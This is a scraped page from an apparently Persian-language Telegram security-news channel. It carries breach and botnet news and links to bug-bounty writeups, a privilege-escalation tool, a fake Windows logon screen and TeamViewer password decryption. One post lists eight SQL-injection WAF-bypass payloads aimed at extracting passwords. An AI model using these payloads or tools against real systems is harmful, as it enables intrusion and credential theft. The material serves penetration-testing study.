امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
رتبه بندی کشورهای میزبان سرورهای کنترل کننده بات نت ها در سال ۲۰۱۹


(توی بیست تای اول نیستیم)


https://www.spamhaus.org/news/article/793/


#news
#botnet


@sec_nerd
Cross-Site Websocket Hijacking bug in Facebook that leads to account takeover


https://ysamm.com/?p=363


#writeup
#facebook
#bugbounty


@sec_nerd
هشت روش برای دور زدن WAF در حملات تزریق SQL

1.Nullbyte:
%00' UNION SELECT password FROM Users WHERE username-'tom'--

2. SQL Comments:
'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/usersame/**/LIKE/**/'tom'--

3. URL encoding:
%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/password%252f%252a*/FROM%252f%252a*/Users%252f%25a*/WHERE%252f%252a*/username%252f%252a*/LIKE%252f%252a*/'tom'--

4. Changing Cases:
UniOn AlL SeLeCt/*inc0gbyt3*/select/**/1,2,3,4,5 --


5. HTTP Parameter Pollution (HPP):
Regular attack SQLi hxxps://www.xxx.com/noticias.php?id=1 union select 1,2 --

HPP attack + SQLi: hxxps://www.xxx.com/noticias.php?id=1&id=*/union/*&id=*/select/*&id=*/1,2+--+


6. Replacing keywords technique
hxxps://www.xxx.com/artigos.php?id=123+UnIoN+SeLselectECT+1,2,3,4,5--

7. CRLF WAF Bypass (Carriage Return, Line Feed) - Common on (aspxasp) applications
Putting theses chars at the beggining of payload

%0A%0d+select+user+from+dual+%0A%0D


8. Buffer Overflow bypassing:
and (select 1) = (select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... A's)



https://incogbyte.github.io/sqli_waf_bypass/


#sqli
#WAF
#web
#pentest


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
صفحه ی فیک لاگین ویندوز که قابلیت ترکیب با سایر ابزارها و بدافزارهای ویندوزی را دارد

زبان سی شارپ

https://github.com/bitsadmin/fakelogonscreen


#windows
#pentest
#malware
#privesc


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
وقتی دستور git رو اشتباه تایپ میکنی

#fun
#dev

@sec_nerd
بالابردن سطح دسترسی از ادمین Hyper-v به یوزر SYSTEM در آخرین نسخه ی پچ شده ی ویندوز ۱۰

https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/


ابزار:
https://github.com/decoder-it/Hyper-V-admin-EOP/




#windows
#privesc
#hyper_v


@sec_nerd
شرکت ژاپنی NEC اعتراف کرد شبکه داخلی اش در سال ۲۰۱۶ مورد حمله ی هکرها قرار گرفته است.
آنها در سال ۲۰۱۷ متوجه ترافیک رمزنگاری شده ی مشکوکی در شبکه داخلی خود شدند که یکسال بعد توانستند آن را رمزگشایی کرده و متوجه شوند که این ترافیک بیش از ۲۷ هزار فایل را از بخش تجارت دفاعی شرکت به سرقت برده است!
با اینکه شرکت NEC دومین شرکت پیمانکار نظامی در ژاپن است که مورد حمله ی هکرها قرار میگیرد اما مسئولان این شرکت اعلام کردند که داده های سرقت شده حاوی پروژه های دفاعی یا اطلاعات شخصی کارکنان نبوده است.



https://www.zdnet.com/article/japanese-company-nec-confirms-2016-security-breach/


#breach
#news
#japan


@sec_nerd
بر اساس گزارش SonicWall هکرها به دنبال نفوذ به سیستم های کنترل ورود به منزل و درب های هوشمند هستند تا از این طریق حملات DDOS را صورت دهند.
این دستگاههای هوشمند NSC Linear eMerge E3 نام دارند و تا کنون ۱۰ آسیب پذیری از آنها کشف شده است که یکی از آنها از نوع command injection است و به هکرها اجازه میدهد بدون احراز هویت، اقدام به اجرای دستور از دور نمایند.



https://www.zdnet.com/article/hackers-are-hijacking-smart-building-access-systems-to-launch-ddos-attacks/


#iot
#ddos
#news


@sec_nerd
رایت آپ مهندسی معکوس teamviewer و کشف محل ذخیره سازی پسوردهای رمزنگاری شده در رجیستری و سپس یافتن کلید رمزنگاری و IV و در نهایت رمزگشایی پسورد


https://whynotsecurity.com/blog/teamviewer/


#writeup
#teamviewer
#RE

@sec_nerd